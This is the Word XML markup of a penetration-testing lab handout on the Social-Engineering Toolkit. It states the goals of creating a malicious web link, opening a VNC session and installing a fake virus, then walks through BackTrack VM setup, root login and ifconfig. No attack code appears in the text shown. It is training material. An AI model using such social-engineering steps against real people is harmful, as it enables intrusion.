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3A705B" w14:textId="7F6B01AF" w:rsidR="00B021D6" w:rsidRPr="00D7332F" w:rsidRDefault="00B021D6" w:rsidP="00B021D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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FB0007"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Social Engineering Toolkit (SET): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3635ACF1" w14:textId="4B5E67F6" w:rsidR="005253C4" w:rsidRPr="00D7332F" w:rsidRDefault="00B021D6" w:rsidP="00B021D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Create Malicious Weblink, Install </w:t>
      </w:r>
      <w:r w:rsidR="00992F56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Virus, Capture Forensic Images </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592E39C2" w14:textId="5D6AB10D" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00B021D6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D7332F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Section 0. Background Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE3F92F" w14:textId="3CB8D8A1" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t>What is the Social-Engineering Toolkit (SET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DB6EE6" w14:textId="6F9FE784" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C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ind w:left="720"/>
        <w:jc w:val="both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ab/>
        <w:t>The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A138A" w14:textId="6481B0AE" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C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ind w:left="720"/>
        <w:jc w:val="both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ab/>
        <w:t>It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380C98DC" w14:textId="5E63FB9F" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C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ind w:left="720"/>
        <w:jc w:val="both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ab/>
        <w:t>Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5650FB60" w14:textId="77777777" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC86857" w14:textId="77777777" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lab Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257C2F9" w14:textId="77777777" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C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In this lab we will do the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF9D8E" w14:textId="77777777" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00D7332F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs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Use Set to Create a Malicious Web Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAC14EC" w14:textId="77777777" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00D7332F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs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Create an addition VNC Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AB6E64" w14:textId="77777777" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00D7332F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs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Install a Fake Virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611716F0" w14:textId="1BB69ED7" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C">
      <w:pPr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Capture a Forensics Memory and Hard Disk Image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F84D89" w14:textId="1D7B036F" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6776"/>
        </w:tabs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D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC359C9" w14:textId="5030B5C1" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C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D7332F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Section 1. Configure BackTrack Virtual Machine Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C53685" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open Your VMware Player</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C947AA" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F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ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FB0007"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CEF2D6" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs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D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>On Your Host Computer, Go To</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346F0C7" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs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D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Start --&gt; All Program --&gt; VMWare --&gt; VMWare Player</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038FF7DC" w14:textId="66D68ACD" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F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4524663F" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F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Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Edit BackTrack Virtual Machine Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207368FD" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F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ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FB0007"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F6D2F" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs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D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Highlight BackTrack5R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821AF76" w14:textId="5AEE74A1" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Click Edit virtual machine settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD433C" w14:textId="20E82592" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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D7332F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DED6AA9" wp14:editId="1C79958D">
            <wp:extent cx="5880692" cy="4331349"/>
            <wp:effectExtent l="0" t="0" r="1270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037" cy="4359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10FF8" w14:textId="08FD3A21" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F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Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8E60D4" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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Edit Network Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232586A6" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB5BC7" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1620" w:hanging="36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Highlight Network Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ECDA73" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1620" w:hanging="36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Select Bridged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A856309" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00D7332F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="1620" w:hanging="36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Do not Click on the OK Button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A659E2" w14:textId="77777777" w:rsidR="00A7158C" w:rsidRPr="00D7332F" w:rsidRDefault="00A7158C" w:rsidP="00A7158C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A355ABC" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00A7158C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE6D1EA" w14:textId="1D17F484" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00A7158C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53A841BE" wp14:editId="208F5AB8">
            <wp:extent cx="5835015" cy="434594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929" cy="437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FECF9" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00A7158C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D7BDD4" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00A7158C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379A5F28" w14:textId="3FF34AD2" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="00A7158C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D7332F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Section 2. Login to BackTrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D8933" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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Start BackTrack VM Instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04554B63" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5739D0FB" w14:textId="30F22395" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="00D7332F" w:rsidP="00D7332F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1.</w:t>
      </w:r>
      <w:r w:rsidR="009F0C0A" w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Start Up VMWare Player</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601319FA" w14:textId="695337F4" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="00D7332F" w:rsidP="00D7332F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="009F0C0A" w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Select BackTrack5R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A29EF" w14:textId="6603D528" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="00D7332F" w:rsidP="00D7332F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</w:t>
      </w:r>
      <w:r w:rsidR="009F0C0A" w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Play virtual machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280524ED" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68665204" w14:textId="19583457" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15037EE9" wp14:editId="7B10B89A">
            <wp:extent cx="6223635" cy="4345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958" cy="435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53DE8" w14:textId="0680ADC8" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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2.Login to BackTrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D4EF48" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC7CB0" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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Login: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537734DF" w14:textId="4A785C7B" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Password: toor or &lt;whatever you changed it to&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119795FE" w14:textId="22DB0076" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="473DE309" wp14:editId="22333E13">
            <wp:extent cx="5994400" cy="48031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557" cy="4827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1D568" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C31EDF9" w14:textId="034923C9" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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3.Bring up the GNOME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72832925" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68617181" w14:textId="2CCE596B" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Type startx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE7531" w14:textId="7EB3E663" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4697B46E" wp14:editId="646635E0">
            <wp:extent cx="5942965" cy="4917440"/>
            <wp:effectExtent l="0" t="0" r="635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043" cy="4923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F72B0" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DB20CE" w14:textId="769285C5" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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D7332F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Section 3: Open Console Terminal and Retrieve IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E8B80" w14:textId="5B5C862F" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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1.Open a console terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A9400" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E22DA70" w14:textId="61ACB06B" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Click on the console terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794A4D3" w14:textId="2CA6E68F" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31F7CAA2" wp14:editId="4941BB9F">
            <wp:extent cx="5943430" cy="617474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703" cy="6187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46BA0" w14:textId="3AD5BBF9" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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2.Get IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC1AD1F" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101B497E" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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ifconfig -a</w:t>
      </w:r>
    </w:p>
